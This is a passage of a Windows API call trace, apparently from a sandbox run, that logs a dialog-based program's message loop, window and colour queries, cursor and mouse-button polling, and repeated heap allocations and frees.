(nIndex=15) returned 0xf0f0f0 [0263.804] GetSysColor (nIndex=8) returned 0x0 [0263.805] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0263.805] SetBkColor (hdc=0x43010772, color=0xf0f0f0) returned 0xf0f0f0 [0263.807] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.807] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.807] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.807] NtdllDialogWndProc_W () returned 0x0 [0263.807] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.807] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.807] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.807] NtdllDialogWndProc_W () returned 0x0 [0263.808] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.808] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0263.808] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.808] NtdllDialogWndProc_W () returned 0x1 [0263.808] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.808] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.808] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.808] SetBkColor (hdc=0x5601008e, color=0xf0f0f0) returned 0xffffff [0263.808] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.809] NtdllDialogWndProc_W () returned 0x0 [0263.809] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.809] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.809] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.809] SetBkColor (hdc=0x5601008e, color=0xf0f0f0) returned 0xf0f0f0 [0263.809] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.809] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.809] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0263.809] NtdllDialogWndProc_W () returned 0x0 [0263.809] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.809] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.809] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0263.809] NtdllDialogWndProc_W () returned 0x0 [0263.809] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.809] NtdllDialogWndProc_W () returned 0x1 [0263.809] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.810] SetBkColor (hdc=0x38010722, color=0xf0f0f0) returned 0xffffff [0263.810] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] NtdllDialogWndProc_W () returned 0x0 [0263.810] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] GetSysColor (nIndex=15) returned 0xf0f0f0 [0263.810] SetBkColor (hdc=0x38010722, color=0xf0f0f0) returned 0xf0f0f0 [0263.810] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0263.810] NtdllDialogWndProc_W () returned 0x0 [0263.810] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.810] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0263.810] NtdllDialogWndProc_W () returned 0x0 [0263.811] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.811] TranslateMessage (lpMsg=0x91fd04) returned 0 [0263.811] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0263.811] GetForegroundWindow () returned 0x80170 [0263.811] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.811] GetCursorPos (in: lpPoint=0x91fb40 | out: lpPoint=0x91fb40*(x=555, y=537)) returned 1 [0263.811] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91fb40 | out: lpPoint=0x91fb40) returned 1 [0263.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe905e8 [0263.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837a8 [0263.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1a80 [0263.811] GetAsyncKeyState (vKey=1) returned 0 [0263.811] GetAsyncKeyState (vKey=2) returned 0 [0263.811] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb200 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83748 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef19f0 [0263.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83748 | out: hHeap=0xc60000) returned 1 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebae68 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83748 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81240 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1a40 [0263.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a40 | out: hHeap=0xc60000) returned 1 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1a40 [0263.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a40 | out: hHeap=0xc60000) returned 1 [0263.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81240 | out: hHeap=0xc60000) returned 1 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a40 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xca7158 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef19c0 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1980 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81240 [0263.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1980 | out: hHeap=0xc60000) returned 1 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81270 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83778 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83790 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1980 [0263.812] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1990 [0263.812] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81240 | out: hHeap=0xc60000) returned 1 [0263.813] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1990 | out: hHeap=0xc60000) returned 1 [0263.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81240 [0263.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837c0 [0263.813] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81450 [0263.814] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1990 [0263.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81450 | out: hHeap=0xc60000) returned 1 [0263.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1990 | out: hHeap=0xc60000) returned 1 [0263.814] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837c0 | out: hHeap=0xc60000) returned 1 [0263.814] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0263.814] TranslateMessage (lpMsg=0x91fd04) returned 0 [0263.814] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0263.814] GetForegroundWindow () returned 0x80170 [0263.814] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0263.814] GetCursorPos (in: lpPoint=0x91fb40 | out: lpPoint=0x91fb40*(x=555, y=537)) returned 1 [0263.815] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91fb40 | out: lpPoint=0x91fb40) returned 1 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe90618 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837c0 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1990 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1970 [0263.815] GetAsyncKeyState (vKey=1) returned 0 [0263.815] GetAsyncKeyState (vKey=2) returned 0 [0263.815] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebae40 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81450 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1950 [0263.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x6) returned 0xef1960 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x82) returned 0xcaaf48 [0263.815] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1940 [0263.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcaaf48 | out: hHeap=0xc60000) returned 1 [0263.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1940 | out: hHeap=0xc60000) returned 1 [0263.815] CreateAcceleratorTableW (paccel=0xef1960, cAccel=1) returned 0x150171 [0263.815] GetForegroundWindow () returned 0x80170 [0263.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1950 | out: hHeap=0xc60000) returned 1 [0263.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81450 | out: hHeap=0xc60000) returned 1 [0263.815] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebae40 | out: hHeap=0xc60000) returned 1 [0263.816] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.816] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1950 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1950 | out: hHeap=0xc60000) returned 1 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1ba0 [0263.816] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1950 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81450 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1960 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a80 | out: hHeap=0xc60000) returned 1 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837a8 | out: hHeap=0xc60000) returned 1 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe905e8 | out: hHeap=0xc60000) returned 1 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81450 | out: hHeap=0xc60000) returned 1 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1950 | out: hHeap=0xc60000) returned 1 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebae40 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81450 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1950 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837a8 [0263.816] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.816] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.816] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.817] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.817] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.817] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1970 | out: hHeap=0xc60000) returned 1 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837c0 | out: hHeap=0xc60000) returned 1 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1990 | out: hHeap=0xc60000) returned 1 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe90618 | out: hHeap=0xc60000) returned 1 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.817] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.817] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.817] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.818] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.818] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.818] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.818] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.818] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.818] Sleep (dwMilliseconds=0x0) [0263.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.826] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.827] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.827] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.827] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.827] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.827] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.827] Sleep (dwMilliseconds=0x0) [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.827] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.827] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.828] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.828] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.828] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.828] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.828] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.828] Sleep (dwMilliseconds=0x0) [0263.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.830] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.831] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1be0 [0263.831] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1be0 | out: hHeap=0xc60000) returned 1 [0263.831] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.831] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.831] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.831] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.831] 